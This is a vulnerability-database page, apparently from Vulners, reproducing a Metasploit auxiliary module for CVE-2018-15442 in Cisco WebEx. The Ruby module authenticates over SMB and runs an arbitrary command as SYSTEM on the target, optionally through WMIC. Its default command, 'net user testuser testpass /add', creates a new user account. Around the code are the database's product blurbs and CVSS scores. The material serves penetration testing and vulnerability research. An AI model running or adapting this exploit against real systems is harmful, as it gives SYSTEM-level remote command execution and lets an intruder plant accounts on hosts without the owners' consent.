Lucene search
K

WebEx Remote Command Execution Utility

🗓️ 23 Oct 2018 20:51:23Reported by Ron Bowes <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 51 Views

WebEx Remote Command Execution Utility module for Metasploit framework. Enables execution of single command as System by exploiting remote code execution vulnerability in Cisco's WebEx client software

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client::WebExec
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Aliases for common classes
  SIMPLE = Rex::Proto::SMB::SimpleClient
  XCEPT  = Rex::Proto::SMB::Exceptions
  CONST  = Rex::Proto::SMB::Constants

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WebEx Remote Command Execution Utility',
      'Description'    => %q{
        This module enables the execution of a single command as System by exploiting a remote
        code execution vulnerability in Cisco's WebEx client software.
      },

      'Author'         => [
        'Ron Bowes <[email protected]>',
      ],

      'License'        => MSF_LICENSE,
      'References'     => [
        ['URL', 'https://webexec.org'],
        ['CVE', '2018-15442']
      ]
    ))

    register_options([
      OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net user testuser testpass /add']),
      OptPort.new('RPORT', [true, 'The Target port', 445]),
      OptBool.new('FORCE_GUI', [true, 'Ensure a GUI is created via wmic', false]),
    ])
  end

  # This is the main control method
  def run_host(ip)
    @smbshare = datastore['SMBSHARE']
    @ip = ip

    # Try and authenticate with given credentials
    if connect
      begin
        smb_login
      rescue Rex::Proto::SMB::Exceptions::Error => autherror
        print_error("Unable to authenticate with given credentials: #{autherror}")
        return
      end

      command = datastore['COMMAND']
      if datastore['FORCE_GUI']
        command = "WMIC PROCESS CALL Create \"#{command}\""
      end

      wexec(true) do |opts|
        execute_single_command(command, opts)
      end

      print_good("Command completed!")
      disconnect
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Oct 2018 21:18Current
7.9High risk
Vulners AI Score7.9
CVSS 37.8
CVSS 27.2
EPSS0.1602
SSVC
51